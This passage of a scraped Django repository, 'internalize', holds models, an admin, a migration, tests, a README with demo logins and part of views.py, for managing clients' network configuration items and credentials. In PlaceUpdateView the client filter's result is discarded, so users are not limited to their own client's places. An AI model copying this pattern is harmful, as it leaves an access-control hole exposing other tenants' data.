"num_lines": 130, "path": "/cis/tests/tests_loader.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from pathlib import Path\nfrom collections import namedtuple\nfrom openpyxl import Workbook\nfrom django.test import TestCase\n\nfrom accounts.models import User\nfrom ..models import Client, Place, Contract, Manufacturer\nfrom ..loader import CILoader\nfrom ..cis_mapping import CIS_SHEET, \\\n APPLIANCES_SHEET\n\nSPREADSHEET_FILE = 'cis_test.xlsx'\nCLIENT_NAME = 'New Client'\n\n\nclass CILoaderTest(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n create_workbook()\n cls.company_client = Client.objects.create(name=CLIENT_NAME)\n cls.loader = CILoader(SPREADSHEET_FILE, cls.company_client).save()\n\n @classmethod\n def tearDownClass(cls):\n Path(SPREADSHEET_FILE).unlink()\n super().tearDownClass()\n\n def test_return_correct_client_object(self):\n self.assertIsInstance(self.loader.client, Client)\n self.assertEqual(self.loader.client.name, CLIENT_NAME)\n\n def test_return_correct_site_objects(self):\n sites = self.loader.places\n keys = {'NY1', 'NY2', 'SP', 'BH'}\n for k, site in sites.items():\n self.assertIn(k, keys)\n self.assertIsInstance(site, Place)\n\n def test_return_correct_contract_objects(self):\n contracts = self.loader.contracts\n keys = {'SP-001', 'BH-001', 'NY-001', 'NY-002'}\n for k, contract in contracts.items():\n self.assertIn(k, keys)\n self.assertIsInstance(contract, Contract)\n\n def test_return_correct_manufacture_objects(self):\n manufacturers = self.loader.manufacturers\n keys = {'Cisco', 'F5'}\n for k, manufacturer in manufacturers.items():\n self.assertIn(k, keys)\n self.assertIsInstance(manufacturer, Manufacturer)\n\n def test_loader_contains_correct_number_of_cis(self):\n self.assertEqual(len(self.loader.cis), 5)\n\n def test_errors_contain_duplicated_items(self):\n create_workbook()\n loader = CILoader(SPREADSHEET_FILE, self.company_client).save()\n 
self.assertEqual(len(loader.errors), 5)\n self.assertEqual(len(loader.cis), 0)\n self.assertTrue(\n 'unique constraint' in str(loader.errors[0].exc).lower()\n )\n\n\ndef create_workbook():\n wb = Workbook()\n set_cis_sheet(wb)\n set_appliances_sheet(wb)\n wb.save(filename=SPREADSHEET_FILE)\n\n\ndef set_cis_sheet(workbook):\n cis_sheet = workbook.create_sheet(CIS_SHEET)\n Row = namedtuple('Row', (\n 'hostname',\n 'ip',\n 'description',\n 'deployed',\n 'business_impact',\n 'site',\n 'site_description',\n 'contract',\n 'contract_begin',\n 'contract_end',\n 'contract_description',\n 'username',\n 'password',\n 'enable_password',\n 'instructions',\n ))\n base = Row('router_sp', '172.16.5.10', 'Main Router',\n 'x', 'high', 'SP', 'Center', 'SP-001',\n '2021-01-01', '2022-01-01', 'Contract Details',\n 'admin', 'admin', 'enable', 'Instructions')\n rows = (\n Row._fields,\n base,\n base._replace(hostname='router_bh', ip='172.16.6.10',\n site='BH', contract='BH-001'),\n base._replace(hostname='wlc1', ip='172.16.10.10',\n description='Controller Floor 1', site='NY1',\n site_description='Main', contract='NY-001'),\n base._replace(hostname='wlc2', ip='172.16.10.11',\n description='Controller Floor 2', site='NY2',\n site_description='Secondary', contract='NY-002'),\n base._replace(hostname='fw', ip='10.10.20.20',\n description='Firewall'),\n )\n for row in rows:\n cis_sheet.append(row)\n\n\ndef set_appliances_sheet(workbook):\n appliances_sheet = workbook.create_sheet(APPLIANCES_SHEET)\n Row = namedtuple('ApplianceRow', (\n 'ci_hostname', 'serial_number', 'manufacture', 'model', 'virtual',\n ))\n rows = (\n Row._fields,\n Row('wlc1', 'FOX123', 'Cisco', '3560', 'x'),\n Row('wlc1', 'FOX124', 'Cisco', '3560', 'x'),\n Row('wlc2', 'FOX125', 'Cisco', '3560', 'x'),\n Row('router_sp', 'TYF987', 'Cisco', '2960', 'x'),\n Row('router_bh', 'TYF654', 'Cisco', '2960', 'x'),\n Row('fw', '687F', 'F5', 'BIG-IP', ''),\n )\n for row in rows:\n appliances_sheet.append(row)\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.5904762148857117, "avg_line_length": 20, "blob_id": "8924796e059cecc7e0b0bc5aa32b9c9bae569a94", "content_id": "72e13a284caad51753e85c65256ac903a7cace27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 210, "license_type": "no_license", "max_line_length": 49, "num_lines": 10, "path": "/cis/templates/cis/manufacturer_detail.html", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "{% extends \"base_generic.html\" %}\n\n{% block title %}{{ manufacturer }}{% endblock %}\n\n{% block content %}\n<h1 class=\"h5 my-4\">{{ manufacturer }}</h1>\n\n<p>Number of CIs: {{ num_appliances }}</p>\n\n{% endblock %}\n" }, { "alpha_fraction": 0.5527235269546509, "alphanum_fraction": 0.5616509318351746, "avg_line_length": 45.84242248535156, "blob_id": "7abad356aafec4affb2bdd218c03cd86c88ec59e", "content_id": "1087fdbd290d3920872eac6dc9cbaebe7e54b1d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7729, "license_type": "no_license", "max_line_length": 234, "num_lines": 165, "path": "/cis/migrations/0001_initial.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-04-28 17:16\n\nfrom django.conf import settings\nimport django.core.validators\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport fernet_fields.fields\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n 
dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Client',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=50, unique=True)),\n ],\n options={\n 'ordering': ['name'],\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Contract',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=100, unique=True)),\n ('begin', models.DateField()),\n ('end', models.DateField()),\n ('description', models.TextField()),\n ],\n ),\n migrations.CreateModel(\n name='Credential',\n fields=[\n ('credential_id', models.AutoField(primary_key=True, serialize=False)),\n ('username', fernet_fields.fields.EncryptedCharField(max_length=50)),\n ('password', fernet_fields.fields.EncryptedCharField(max_length=50)),\n ('enable_password', fernet_fields.fields.EncryptedCharField(max_length=50)),\n ('instructions', fernet_fields.fields.EncryptedCharField(blank=True, max_length=255, null=True)),\n ],\n ),\n migrations.CreateModel(\n name='ISP',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=50, unique=True)),\n ],\n options={\n 'ordering': ['name'],\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Manufacturer',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=50, unique=True)),\n ],\n options={\n 'ordering': ['name'],\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='CI',\n fields=[\n ('credential_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='cis.credential')),\n ('hostname', models.CharField(max_length=50)),\n ('ip', models.GenericIPAddressField()),\n ('description', models.CharField(max_length=255)),\n ('deployed', models.BooleanField(default=False)),\n ('business_impact', models.PositiveSmallIntegerField(choices=[(0, 'low'), (1, 'medium'), (2, 'high')], default=0, validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(2)])),\n ('status', models.PositiveSmallIntegerField(choices=[(0, 'created'), (1, 'sent'), (2, 'approved')], default=0, validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(2)])),\n ],\n options={\n 'ordering': ['hostname'],\n },\n bases=('cis.credential',),\n ),\n migrations.CreateModel(\n name='Place',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=50)),\n ('description', models.CharField(blank=True, max_length=255, null=True)),\n ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cis.client')),\n ],\n ),\n migrations.CreateModel(\n name='Circuit',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('identifier', models.CharField(max_length=50)),\n ('bandwidth', models.CharField(max_length=10)),\n ('type', models.CharField(max_length=50)),\n ('description', models.CharField(max_length=255)),\n ('isp', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cis.isp')),\n 
('place', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cis.place')),\n ],\n ),\n migrations.CreateModel(\n name='CIPack',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('sent_at', models.DateTimeField(auto_now_add=True, null=True)),\n ('approved_by', models.ForeignKey(limit_choices_to={'is_superuser': True}, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='cipacks_approved', to=settings.AUTH_USER_MODEL)),\n ('responsible', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Appliance',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('serial_number', models.CharField(max_length=255, unique=True)),\n ('model', models.CharField(max_length=100)),\n ('virtual', models.BooleanField(default=False)),\n ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cis.client')),\n ('manufacturer', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='cis.manufacturer')),\n ],\n options={\n 'ordering': ['serial_number'],\n },\n ),\n migrations.AddConstraint(\n model_name='place',\n constraint=models.UniqueConstraint(fields=('client', 'name'), name='unique_client_place_name'),\n ),\n migrations.AddField(\n model_name='ci',\n name='appliances',\n field=models.ManyToManyField(to='cis.Appliance'),\n ),\n migrations.AddField(\n model_name='ci',\n name='client',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cis.client'),\n ),\n migrations.AddField(\n model_name='ci',\n name='contract',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='cis.contract'),\n ),\n migrations.AddField(\n model_name='ci',\n name='pack',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='cis.cipack'),\n ),\n migrations.AddField(\n model_name='ci',\n name='place',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cis.place'),\n ),\n migrations.AddConstraint(\n model_name='ci',\n constraint=models.UniqueConstraint(fields=('client', 'hostname', 'ip', 'description'), name='unique_client_hostname_ip_description'),\n ),\n ]\n" }, { "alpha_fraction": 0.5953741669654846, "alphanum_fraction": 0.596038818359375, "avg_line_length": 32.140968322753906, "blob_id": "71784eb58319ae0e8c879772480ea283ecf0aa44", "content_id": "534dc862c01eea20b97e93b9064fe12c66589464", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7523, "license_type": "no_license", "max_line_length": 98, "num_lines": 227, "path": "/cis/admin.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.contrib import admin, messages\nfrom django.contrib.admin import AdminSite\nfrom django.db import DatabaseError, transaction\nfrom django.db.models import QuerySet\nfrom django.urls import reverse\nfrom django.utils.html import format_html\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import ngettext\n\nfrom .models import (\n Client, Place, ISP, Circuit,\n CI, Manufacturer, Appliance, Contract, CIPack\n)\n\n\nSITE = 'Internalize'\nAdminSite.site_header = SITE\nAdminSite.site_title = SITE\n\n\nclass ClientLinkMixin:\n \"\"\"Add the Client name as a link\"\"\"\n\n @admin.display(description='Client', 
ordering='client__name')\n def client_link(self, obj):\n url = f'{reverse(\"admin:cis_client_change\", args={obj.client.pk})}'\n return format_html('<a href=\"{}\">{}</a>', url, obj.client.name)\n\n\nclass PlaceInline(admin.TabularInline):\n model = Place\n extra = 1\n\n\[email protected](Client)\nclass ClientAdmin(admin.ModelAdmin):\n list_display = ('name', 'view_places')\n search_fields = ('name', 'place__name')\n view_on_site = False\n inlines = (PlaceInline,)\n\n @admin.display(description='Places')\n def view_places(self, obj):\n places = obj.place_set.all()\n places_link_list = ['<ul>']\n for place in places:\n url = f'{reverse(\"admin:cis_place_change\", args={place.pk})}'\n safe_link = format_html('<a href=\"{}\">{}</a>', url, place.name)\n places_link_list.append(f'<li>{safe_link}</li>')\n places_link_list.append('</ul>')\n return mark_safe('\\n'.join(places_link_list))\n\n\nclass CIInline(admin.TabularInline):\n model = CI\n extra = 0\n max_num = 0 # prevents the link `add another` from appearing\n fields = ('description', 'deployed', 'business_impact', 'contract', 'status', 'pack')\n readonly_fields = ('description', 'deployed', 'business_impact', 'contract', 'status', 'pack')\n show_change_link = True\n\n\[email protected](Place)\nclass PlaceAdmin(admin.ModelAdmin, ClientLinkMixin):\n list_display = ('name', 'client_link', 'description')\n list_filter = ('client',)\n list_editable = ('description',)\n search_fields = ('name', 'client__name', 'description')\n inlines = (CIInline,)\n\n\[email protected](Appliance)\nclass ApplianceAdmin(admin.ModelAdmin, ClientLinkMixin):\n list_display = (\n 'serial_number',\n 'client_link',\n 'manufacturer_link',\n 'model',\n 'virtual',\n )\n list_filter = ('client', 'manufacturer', 'virtual')\n list_editable = ('model', 'virtual')\n search_fields = ('serial_number', 'model', 'client', 'manufacturer')\n #autocomplete_fields = ('client', 'manufacturer')\n\n @admin.display(description='Manufacturer', ordering='manufacturer__name')\n def manufacturer_link(self, obj):\n url = f'{reverse(\"admin:cis_manufacturer_change\", args={obj.manufacturer.pk})}'\n return format_html('<a href=\"{}\">{}</a>', url, obj.manufacturer.name)\n\n\nclass ApplianceInline(admin.TabularInline):\n model = Appliance\n extra = 1\n\n\[email protected](Manufacturer)\nclass ManufacturerAdmin(admin.ModelAdmin):\n list_display = ('name', 'view_appliances')\n search_fields = ('name',)\n inlines = (ApplianceInline,)\n\n @admin.display(description='Appliances')\n def view_appliances(self, obj):\n count = obj.appliance_set.count()\n url = f'{reverse(\"admin:cis_appliance_changelist\")}?manufacturer__id__exact={obj.pk}'\n return format_html('<a href=\"{}\">{} Appliances</a>', url, count)\n\n\[email protected](Contract)\nclass ContractAdmin(admin.ModelAdmin):\n FIELDS = ('name', 'begin', 'end', 'description')\n\n date_hierarchy = 'begin'\n list_display = FIELDS\n list_filter = ('begin', 'end')\n search_fields = FIELDS\n inlines = (CIInline,)\n\n\[email protected](CI)\nclass CIAdmin(admin.ModelAdmin, ClientLinkMixin):\n list_display = (\n 'hostname',\n 'client_link',\n 'place_link',\n 'ip',\n 'description',\n 'deployed',\n 'business_impact',\n 'contract',\n 'status',\n 'view_appliances',\n 'pack',\n )\n list_filter = ('pack', 'status', 'client__name', 'place', 'deployed', 'contract')\n actions = ['approve_selected_cis']\n readonly_fields = ('status',)\n fieldsets = (\n ('Client', {'fields': ((), ('client', 'place',))}),\n ('Configuration Item', {'fields': (\n 'appliances',\n 
('hostname', 'ip', 'deployed'),\n ('description', 'business_impact'),\n )}),\n ('Contract', {'fields': ('contract',)}),\n ('Credentials', {\n 'fields': (\n (),\n ('username', 'password', 'enable_password', 'instructions')),\n 'classes': ('collapse',),\n }),\n ('Management', {\n 'fields': ('status',),\n })\n )\n filter_horizontal = ('appliances',)\n list_editable = (\n 'ip',\n 'description',\n 'deployed',\n 'business_impact',\n )\n list_select_related = ('contract', 'client', 'place', 'pack')\n\n @admin.display(description='Place', ordering='place__name')\n def place_link(self, obj):\n url = f'{reverse(\"admin:cis_place_change\", args={obj.place.pk})}'\n return format_html('<a href=\"{}\">{}</a>', url, obj.place.name)\n\n @admin.display(description='Appliances')\n def view_appliances(self, obj):\n count = obj.appliances.count()\n url = f'{reverse(\"admin:cis_appliance_changelist\")}?ci__exact={obj.pk}'\n return format_html('<a href=\"{}\">{} Appliances</a>', url, count)\n\n @admin.action(description='Mark selected CIs as approved')\n def approve_selected_cis(self, request, queryset: QuerySet):\n # todo Write test\n pack_ids = set(queryset.values_list('pack', flat=True))\n try:\n with transaction.atomic():\n count = queryset.update(status=2)\n CIPack.objects.filter(pk__in=pack_ids).update(approved_by=request.user)\n self.message_user(\n request,\n ngettext(\n 'The selected CI was approved successfully.',\n 'The selected CIs were approved successfully.',\n count\n ),\n level=messages.SUCCESS,\n )\n except DatabaseError as e:\n raise DatabaseError(f'An error occurred during the approval: {e}')\n\n\[email protected](CIPack)\nclass CIPackAdmin(admin.ModelAdmin):\n FIELDS = ('sent_at', 'responsible', 'percentage_of_cis_approved', 'approved_by')\n\n list_display = FIELDS\n actions = ['approve_all_cis']\n list_filter = ('responsible', 'sent_at', 'approved_by')\n readonly_fields = FIELDS\n inlines = (CIInline,)\n\n @admin.action(description=\"Approve all CIs of selected CIPacks\")\n def approve_all_cis(self, request, queryset: QuerySet):\n try:\n with transaction.atomic():\n for pack in queryset:\n pack.approve_all_cis()\n self.message_user(\n request,\n ngettext(\n 'The selected CI pack was approved successfully.',\n 'The selected CI packs were approved successfully.',\n len(queryset)\n ),\n level=messages.SUCCESS,\n )\n except DatabaseError as e:\n raise DatabaseError(f'An error occurred during the approval: {e}')\n\n# admin.site.register(ISP)\n# admin.site.register(Circuit)\n" }, { "alpha_fraction": 0.6449860334396362, "alphanum_fraction": 0.6535016894340515, "avg_line_length": 28.74235725402832, "blob_id": "cff8147e7a97d1d84c8cc92986888909a2c7edc6", "content_id": "76a6f393e9070304b5d95a31c770dd1e18f2a526", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6811, "license_type": "no_license", "max_line_length": 96, "num_lines": 229, "path": "/cis/models.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from typing import Tuple, NewType\n\nfrom django.contrib import admin\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom fernet_fields import EncryptedCharField\n\nfrom accounts.models import User\n\n\nCIId = NewType('CIId', int)\n\n\nclass Company(models.Model):\n \"\"\"Model representing an abstract Company.\n\n Base for Client, ISP and Manufacturer\n \"\"\"\n\n name = 
models.CharField(max_length=50, unique=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n abstract = True\n ordering = ['name']\n\n\nclass Client(Company):\n \"\"\"Model representing a Client company\"\"\"\n\n search_fields = ('name',)\n\n def get_absolute_url(self):\n return reverse('cis:client_detail', args=(self.id,))\n\n def __str__(self):\n return self.name\n\n\nclass Place(models.Model):\n \"\"\"Model representing a location of a Client\"\"\"\n\n client = models.ForeignKey(Client, on_delete=models.CASCADE)\n name = models.CharField(max_length=50)\n description = models.CharField(max_length=255, blank=True, null=True)\n\n def __str__(self):\n return f\"{self.client} | {self.name}\"\n\n def get_absolute_url(self):\n return reverse('cis:place_update', args=(self.pk,))\n\n class Meta:\n constraints = [\n models.UniqueConstraint(\n fields=['client', 'name'],\n name='unique_client_place_name'\n )\n ]\n\n\nclass ISP(Company):\n \"\"\"Model representing a Internet Service Provider company\"\"\"\n\n\nclass Manufacturer(Company):\n \"\"\"Model representing a Manufacturer of a Configuration Item\"\"\"\n\n\nclass Circuit(models.Model):\n \"\"\"Model representing a Circuit of a ISP installed in a Place\"\"\"\n\n place = models.ForeignKey(Place, on_delete=models.CASCADE)\n isp = models.ForeignKey(ISP, on_delete=models.CASCADE)\n identifier = models.CharField(max_length=50)\n bandwidth = models.CharField(max_length=10)\n type = models.CharField(max_length=50)\n description = models.CharField(max_length=255, help_text=\"\")\n\n def __str__(self):\n return f\"{self.isp.name} | {self.identifier} | {self.bandwidth}\"\n\n\nclass Contract(models.Model):\n \"\"\"Model representing a Contract applied to a CI\"\"\"\n\n name = models.CharField(max_length=100, unique=True)\n begin = models.DateField()\n end = models.DateField()\n description = models.TextField()\n\n def __str__(self):\n return self.name\n\n\nclass ApplianceManager(models.Manager):\n def get_queryset(self):\n return super().get_queryset().select_related('manufacturer')\n\n\nclass Appliance(models.Model):\n \"\"\"Model representing a physical or virtual Appliance that compounds a Configuration Item\"\"\"\n\n # modify the initial queryset to join the Manufacturer\n objects = ApplianceManager()\n\n client = models.ForeignKey(Client, on_delete=models.CASCADE)\n serial_number = models.CharField(max_length=255, unique=True)\n manufacturer = models.ForeignKey(Manufacturer, on_delete=models.SET_NULL, null=True)\n model = models.CharField(max_length=100)\n virtual = models.BooleanField(default=False)\n\n def __str__(self):\n return f\"{self.manufacturer} | {self.model} | {self.serial_number}\"\n\n def get_absolute_url(self):\n return reverse('cis:appliance_update', args=(self.pk,))\n\n class Meta:\n ordering = ['serial_number']\n\n\nclass Credential(models.Model):\n \"\"\"Model representing access credentials of a Configuration Item\"\"\"\n\n credential_id = models.AutoField(primary_key=True)\n username = EncryptedCharField(max_length=50)\n password = EncryptedCharField(max_length=50)\n enable_password = EncryptedCharField(max_length=50)\n instructions = EncryptedCharField(max_length=255, blank=True, null=True)\n\n\nclass CIPack(models.Model):\n \"\"\"\n Model representing a pack of CIs.\n\n It is used to send CIs to production.\n \"\"\"\n\n responsible = models.ForeignKey('accounts.User', on_delete=models.SET_NULL, null=True)\n sent_at = models.DateTimeField(auto_now_add=True, blank=True, null=True)\n approved_by = models.ForeignKey(\n 
'accounts.User',\n on_delete=models.SET_NULL,\n null=True,\n related_name='cipacks_approved',\n limit_choices_to={'is_superuser': True}\n )\n\n @property\n @admin.display(description='Approved (%)')\n def percentage_of_cis_approved(self) -> int:\n num_cis_approved = self.ci_set.filter(status=2).count()\n if not num_cis_approved:\n return 0\n return round((num_cis_approved / len(self)) * 100)\n\n def send_to_production(self, ci_pks: Tuple[CIId, ...]):\n cis = CI.objects.filter(pk__in=ci_pks)\n self.ci_set.set(cis)\n self.ci_set.update(status=1)\n\n def approve_all_cis(self):\n self.ci_set.update(status=2)\n\n def __len__(self):\n return self.ci_set.count()\n\n def __str__(self):\n local_date = timezone.localtime(self.sent_at)\n return f\"{self.responsible} {local_date.strftime('%Y-%m-%d %H:%M:%S')}\"\n\n\nclass CI(Credential):\n \"\"\"\n Model representing a Configuration Item.\n\n It is composed of a Setup and a Credential.\n https://docs.djangoproject.com/en/stable/topics/db/models/#multiple-inheritance\n \"\"\"\n\n IMPACT_OPTIONS = (\n (0, 'low'),\n (1, 'medium'),\n (2, 'high'),\n )\n STATUS_OPTIONS = (\n (0, 'created'),\n (1, 'sent'),\n (2, 'approved'),\n )\n client = models.ForeignKey(Client, on_delete=models.CASCADE)\n place = models.ForeignKey(Place, on_delete=models.CASCADE)\n appliances = models.ManyToManyField(Appliance)\n hostname = models.CharField(max_length=50)\n ip = models.GenericIPAddressField()\n description = models.CharField(max_length=255)\n deployed = models.BooleanField(default=False)\n business_impact = models.PositiveSmallIntegerField(\n choices=IMPACT_OPTIONS,\n default=0,\n validators=[MinValueValidator(0), MaxValueValidator(2)],\n )\n contract = models.ForeignKey(Contract, on_delete=models.SET_NULL, null=True)\n status = models.PositiveSmallIntegerField(\n choices=STATUS_OPTIONS,\n default=0,\n validators=[MinValueValidator(0), MaxValueValidator(2)],\n )\n pack = models.ForeignKey(CIPack, on_delete=models.SET_NULL, null=True)\n\n def __str__(self):\n return f\"{self.place} | {self.hostname} | {self.ip}\"\n\n def get_absolute_url(self):\n return reverse('cis:ci_detail', args=(self.pk,))\n\n class Meta:\n ordering = ['hostname']\n constraints = [\n models.UniqueConstraint(\n fields=['client', 'hostname', 'ip', 'description'],\n name='unique_client_hostname_ip_description'\n )\n ]\n" }, { "alpha_fraction": 0.6836050152778625, "alphanum_fraction": 0.6836050152778625, "avg_line_length": 53.894737243652344, "blob_id": "6cec6aaf593f7865a2cf83ae278502a6e5dfb5e2", "content_id": "025350997e0c990d677a719980dbb710fdf4e78b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1043, "license_type": "no_license", "max_line_length": 102, "num_lines": 19, "path": "/cis/urls.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . 
import views\n\napp_name = 'cis'\n\nurlpatterns = [\n path('cis/<status>/', views.CIListView.as_view(), name='ci_list'),\n path('ci/create/', views.CICreateView.as_view(), name='ci_create'),\n path('ci/upload/', views.ci_upload, name='ci_upload'),\n path('ci/<int:pk>', views.CIDetailView.as_view(), name='ci_detail'),\n path('ci/pack/send/', views.send_ci_pack, name='ci_pack_send'),\n path('places/', views.manage_client_places, name='manage_client_places'),\n path('place/create/', views.PlaceCreateView.as_view(), name='place_create'),\n path('place/<int:pk>', views.PlaceUpdateView.as_view(), name='place_update'),\n path('manufacturer/<int:pk>', views.ManufacturerDetailView.as_view(), name='manufacturer_detail'),\n path('appliances/', views.ApplianceListView.as_view(), name='appliance_list'),\n path('appliance/create/', views.ApplianceCreateView.as_view(), name='appliance_create'),\n path('appliance/<int:pk>', views.ApplianceUpdateView.as_view(), name='appliance_update'),\n]\n" }, { "alpha_fraction": 0.6948391795158386, "alphanum_fraction": 0.7090501189231873, "avg_line_length": 19.890625, "blob_id": "f2945cae70c1773566147fe85c9c493fa24ea0c8", "content_id": "f82b38b36d21f848ccefd175a737282c4e40838c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1337, "license_type": "no_license", "max_line_length": 103, "num_lines": 64, "path": "/README.md", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "# Internalize\n\nThis project is an exercise to apply the concepts of the Django web\nframework and Python.\n\nThe purpose of the app is to ease the transit of configuration\nitem data between an IT managed services provider (MSP) and\nits clients.\n\n\n## Authors\n\n- [@diegovilela](https://www.github.com/diegovilela)\n\n\n## Demo\n\nYou can access it with the following credentials.\n\n| username | password | login page |\n| -------- | -------- | -----------|\n| admin | UnQt5uGgjErbwkN | [for admins][2]\n| [email protected] | UnQt5uGgjErbwkN | [for users][1]\n| [email protected] | UnQt5uGgjErbwkN | [for users][1]\n\n[1]: https://secure-forest-64714.herokuapp.com/cis/cis/0/\n[2]: https://secure-forest-64714.herokuapp.com/admin/\n\n\n## Features\n\n- Admin area\n- Bulk insertion of items\n- Bulk approval of items\n- Responsive\n\n\n## Running Tests\n\nTo run only unit tests:\n```bash\n python manage.py test --exclude-tag functional\n```\n\nTo also run functional tests (requires [geckodriver](https://github.com/mozilla/geckodriver/releases)):\n```bash\n python manage.py test\n```\n\n\n## Installation\n\n```bash\n git clone https://github.com/DiegoVilela/internalize.git\n cd internalize\n pipenv install && pipenv shell\n python manage.py migrate\n python manage.py loaddata all.json\n python manage.py runserver\n```\n\n## Feedback\n\nIf you have any feedback, please reach out to us at [email protected]\n" }, { "alpha_fraction": 0.6651480793952942, "alphanum_fraction": 0.6668564677238464, "avg_line_length": 33.60098648071289, "blob_id": "3218731f1a468f91b8818a5843b514829ec4ac3b", "content_id": "733f1ee8d6287ccc817fcd90043e60126fdd9048", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7024, "license_type": "no_license", "max_line_length": 100, "num_lines": 203, "path": "/cis/views.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.db import DatabaseError\nfrom django.shortcuts import render, redirect\nfrom 
django.utils.translation import ngettext\nfrom django.views.generic import ListView, DetailView, CreateView, UpdateView\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib import messages\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.http import Http404\nfrom django.forms import inlineformset_factory\nfrom django.core.exceptions import PermissionDenied\n\nfrom .models import CI, Client, Place, Manufacturer, Appliance, CIPack\nfrom .forms import UploadCIsForm, CIForm, ApplianceForm, PlaceForm\nfrom .loader import CILoader\nfrom .mixins import UserApprovedMixin, AddClientMixin\n\n\ndef homepage(request):\n user = request.user\n if not user.is_anonymous and not user.is_approved:\n messages.warning(request, 'Your account needs to be approved. '\n 'Please contact you Account Manager.')\n return render(request, 'homepage.html')\n\n\nclass PlaceCreateView(UserApprovedMixin, SuccessMessageMixin, AddClientMixin, CreateView):\n model = Place\n fields = ('name', 'description')\n success_message = \"The place %(name)s was created successfully.\"\n\n\nclass PlaceUpdateView(UserApprovedMixin, SuccessMessageMixin, UpdateView):\n model = Place\n fields = ('name', 'description')\n success_message = \"The place %(name)s was updated successfully.\"\n\n def get_queryset(self):\n qs = Place.objects.select_related('client')\n if not self.request.user.is_superuser:\n qs.filter(client=self.request.user.client)\n return qs\n\n\n@login_required\ndef manage_client_places(request):\n if not request.user.is_approved: raise PermissionDenied()\n\n client = request.user.client\n select_client_form = None\n if request.user.is_superuser:\n select_client_form = PlaceForm()\n\n if request.method == 'GET':\n if request.user.is_superuser:\n if (client_id_selected := request.GET.get('client')):\n # At this point, a client was selected by a superuser\n select_client_form = PlaceForm(request.GET)\n client = Client.objects.get(pk=client_id_selected)\n\n PlaceInlineFormSet = inlineformset_factory(\n Client, Place, fields=('name', 'description'), extra=0)\n formset = PlaceInlineFormSet(instance=client)\n\n if request.method == 'POST':\n formset = PlaceInlineFormSet(request.POST, instance=client)\n if formset.is_valid():\n formset.save()\n messages.success(request, \"The places were updated successfully.\")\n return redirect('cis:manage_client_places')\n\n return render(request, 'cis/manage_client_places.html', {\n 'formset': formset,\n 'select_client_form': select_client_form,\n 'client': client,\n })\n\n\nclass CICreateView(UserApprovedMixin, SuccessMessageMixin, AddClientMixin, CreateView):\n model = CI\n form_class = CIForm\n success_message = \"The CI was created successfully.\"\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n # only places of the user.client will be shown in the form\n kwargs.update({'client': self.request.user.client 